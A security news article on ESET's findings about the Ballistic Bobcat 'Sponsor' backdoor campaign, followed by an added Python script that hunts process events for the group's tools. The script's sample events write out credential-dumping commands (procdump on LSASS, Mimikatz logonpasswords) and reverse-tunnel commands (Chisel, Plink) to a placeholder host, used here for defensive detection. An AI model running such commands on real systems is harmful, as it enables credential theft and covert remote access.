CyberSecurity SEE

Ballistic Bobcat's "Scan and Strike" Backdoor Unveiled

ESET researchers have uncovered a new campaign by the Ballistic Bobcat advanced persistent threat (APT) group, which ESET tracks as Sponsoring Access, targeting entities in Brazil, Israel, and the United Arab Emirates. The campaign uses a previously unknown backdoor called Sponsor, which was discovered after analyzing a sample found on a victim's system in Israel in May 2022. Ballistic Bobcat is suspected to have ties to Iran.

Ballistic Bobcat, also known as APT35/APT42 or Charming Kitten, has a history of targeting education, government, and healthcare organizations, as well as human rights activists and journalists. The group is most active in Israel, the Middle East, and the United States. During the pandemic, it focused on COVID-19-related organizations, including the World Health Organization and Gilead Pharmaceuticals.

The campaign using the Sponsor backdoor follows the group's pattern of narrowly targeted operations of limited duration. Beyond the first sample, ESET researchers discovered four other versions of the backdoor. In total, at least 34 victims in Brazil, Israel, and the United Arab Emirates have been identified.

The campaign begins with the exploitation of known vulnerabilities in internet-exposed Microsoft Exchange servers: Ballistic Bobcat scans for exposed servers, identifies vulnerable ones, and then exploits them. Many of the victims identified in ESET telemetry were likely victims of opportunity rather than preselected targets, and the same exposed servers may well have been compromised by other threat actors too.

The Sponsor backdoor reads its configuration from files stored on disk rather than embedding it in the binary. Those files are deployed by batch files and are deliberately designed to look innocuous, in an attempt to evade detection by scanning engines. Ballistic Bobcat has used this modular approach, with modest success, for the past two and a half years. In addition to the Sponsor backdoor, the group deploys various open-source tools on compromised systems.

The majority of the victims in this campaign are located in Israel, with one victim each in Brazil and the United Arab Emirates. The Israeli victims span a wide range of sectors, including automotive, communications, engineering, financial services, healthcare, insurance, law, manufacturing, retail, technology, and telecommunications, plus several organizations whose sector could not be identified.

ESET researchers have also uncovered indicators of compromise that link this campaign to earlier Ballistic Bobcat attacks on an Israeli victim that operates an insurance marketplace. The tools used in those attacks communicated with the same command-and-control server referenced in an earlier alert from the Cybersecurity and Infrastructure Security Agency (CISA).

To gain initial access, Ballistic Bobcat likely exploited CVE-2021-26855, the ProxyLogon server-side request forgery flaw in Microsoft Exchange, which has been a popular target for many threat actors. During the Sponsoring Access campaign, the group also used a number of open-source tools: host2ip, RevSocks, Mimikatz, GOST, Chisel, Plink, WebBrowserPassView, sqlextractor, and procdump. Most of these fall into two buckets a defender can hunt for directly: tunnelling and proxying tools (RevSocks, GOST, Chisel, Plink) that route attacker traffic through the compromised host, and credential-access tools (Mimikatz, procdump used against LSASS, WebBrowserPassView) that harvest passwords and secrets.
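The tool list above is the most actionable part of the report for a defender. The following Python script is an added example, not ESET's code or anything from the report: it hunts process-creation telemetry for the tools named on this page and for the web-shell footprint that typically follows Exchange exploitation. The events are constructed to look like Sysmon Event ID 1 fields (Image, CommandLine, ParentImage) exported as JSON; they are not real victim data. The command-line patterns are assumptions drawn from each tool's public CLI (procdump `-ma lsass`, chisel `client <server> R:...`, plink `-R`/`-L`, revsocks `-connect`, gost `-L`) so that a renamed binary is still caught by how it is invoked; none of them are indicators published by ESET.

```python
"""Hunt process-creation events for Ballistic Bobcat-style tooling.

Added example; the sample events and the argument patterns are constructed
assumptions, not indicators from the ESET report.
"""
import re

# (rule name, tactic bucket, regex over "Image CommandLine").
# Argument-based patterns are assumptions from the tools' public CLIs.
RULES = [
    ("procdump_lsass", "credential-access",
     re.compile(r"\s-ma\s+.*\blsass", re.I)),            # procdump -ma lsass.exe
    ("mimikatz", "credential-access",
     re.compile(r"mimikatz|sekurlsa::|lsadump::", re.I)),  # module syntax survives renaming
    ("webbrowserpassview", "credential-access",
     re.compile(r"webbrowserpassview|/s(text|comma|csv)\s", re.I)),  # NirSoft export flags
    ("chisel_reverse_tunnel", "command-and-control",
     re.compile(r"chisel|\bclient\s+\S+\s+R:", re.I)),     # chisel client <srv> R:port:...
    ("plink_port_forward", "command-and-control",
     re.compile(r"plink|\s-[RL]\s+\d+:\S+:\d+", re.I)),    # plink -R 3389:127.0.0.1:3389
    ("revsocks", "command-and-control",
     re.compile(r"revsocks|\s-connect\s+\S+:\d+", re.I)),  # revsocks -connect host:port
    ("gost_proxy", "command-and-control",
     re.compile(r"\bgost\b|\s-L[= ]\S*://", re.I)),        # gost -L=socks5://:1080
    ("host2ip", "discovery", re.compile(r"host2ip", re.I)),
    ("sqlextractor", "collection", re.compile(r"sqlextractor", re.I)),
]

# Assumption: the IIS worker process of an Exchange server spawning a shell is
# the usual footprint of a web shell dropped after ProxyLogon-style access.
WEBSHELL_CHILDREN = {"cmd.exe", "powershell.exe"}


def hunt(events):
    """Return a list of findings, one per (event, rule) match."""
    findings = []
    for idx, ev in enumerate(events):
        image = ev.get("Image", "")
        cmd = ev.get("CommandLine", "")
        parent = ev.get("ParentImage", "")
        haystack = f"{image} {cmd}"
        for name, tactic, rx in RULES:
            if rx.search(haystack):
                findings.append({"event": idx, "rule": name, "tactic": tactic, "image": image})
        child = image.rsplit("\\", 1)[-1].lower()
        if parent.lower().endswith("\\w3wp.exe") and child in WEBSHELL_CHILDREN:
            findings.append({"event": idx, "rule": "w3wp_spawns_shell",
                             "tactic": "initial-access", "image": image})
    return findings


# Constructed sample telemetry (not real victim data). Binaries are renamed on
# purpose to show that the argument patterns still fire.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\svchost.exe", "CommandLine": "svchost.exe -k netsvcs",
     "ParentImage": r"C:\Windows\System32\services.exe"},                       # benign
    {"Image": r"C:\Windows\Temp\pd.exe",
     "CommandLine": r"pd.exe -accepteula -ma lsass.exe C:\Windows\Temp\ls.dmp",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},                            # renamed procdump
    {"Image": r"C:\ProgramData\ch.exe",
     "CommandLine": "ch.exe client 203.0.113.10:8080 R:1080:socks",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},                            # renamed chisel
    {"Image": r"C:\Users\Public\plink.exe",
     "CommandLine": "plink.exe -N -R 3389:127.0.0.1:3389 -pw Passw0rd user@203.0.113.10",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},                            # plink reverse forward
    {"Image": r"C:\Users\Public\m.exe",
     "CommandLine": 'm.exe "privilege::debug" "sekurlsa::logonpasswords" exit',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},                            # renamed mimikatz
    {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe"},                  # web shell child
    {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c dir",
     "ParentImage": r"C:\Windows\explorer.exe"},                                # benign
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"event {f['event']}: {f['rule']} [{f['tactic']}] {f['image']}")
```

Running it against the constructed events flags five of the seven: the renamed procdump, chisel and Mimikatz binaries are caught by their arguments, plink by name and by its `-R` forward, and the cmd.exe child of w3wp.exe as a probable web shell; the two benign events produce nothing. In a real hunt, feed it Sysmon or EDR process events exported as JSON and treat the tactic buckets as triage priorities: a single tunnelling hit on an Exchange server is worth an immediate look.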

The discovery of the Sponsoring Access campaign and the Sponsor backdoor highlights the ongoing threat posed by APT groups and their continued efforts to target organizations. It also reinforces the importance of proactive measures, above all promptly patching internet-facing servers such as Exchange and implementing strong security practices, to reduce the risk of falling victim to these attacks.
